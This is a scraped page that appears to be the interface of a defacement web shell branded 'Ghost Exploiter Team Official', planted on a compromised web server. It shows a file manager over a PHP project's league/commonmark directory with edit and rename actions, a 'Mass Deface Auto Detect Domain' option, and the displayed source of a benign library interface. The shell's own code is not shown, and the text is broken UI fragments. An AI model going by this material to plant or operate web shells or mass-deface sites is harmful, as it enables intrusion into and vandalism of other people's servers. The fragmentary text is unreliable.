Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
league
/
commonmark
/
src
/
Extension
/
TableOfContents
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Node
--
ren
Normalizer
--
ren
TableOfContentsBuilder.php
3.738KB
edt
ren
TableOfContentsExtensio
...
2.869KB
edt
ren
TableOfContentsGenerato
...
5.93KB
edt
ren
TableOfContentsGenerato
...
0.545KB
edt
ren
TableOfContentsPlacehol
...
2.476KB
edt
ren
TableOfContentsPlacehol
...
1.016KB
edt
ren
TableOfContentsRenderer
...
1.487KB
edt
ren
<?php declare(strict_types=1); /* * This file is part of the league/commonmark package. * * (c) Colin O'Dell <colinodell@gmail.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace League\CommonMark\Extension\TableOfContents; use League\CommonMark\Extension\TableOfContents\Node\TableOfContents; use League\CommonMark\Node\Block\Document; interface TableOfContentsGeneratorInterface { public function generate(Document $document): ?TableOfContents; }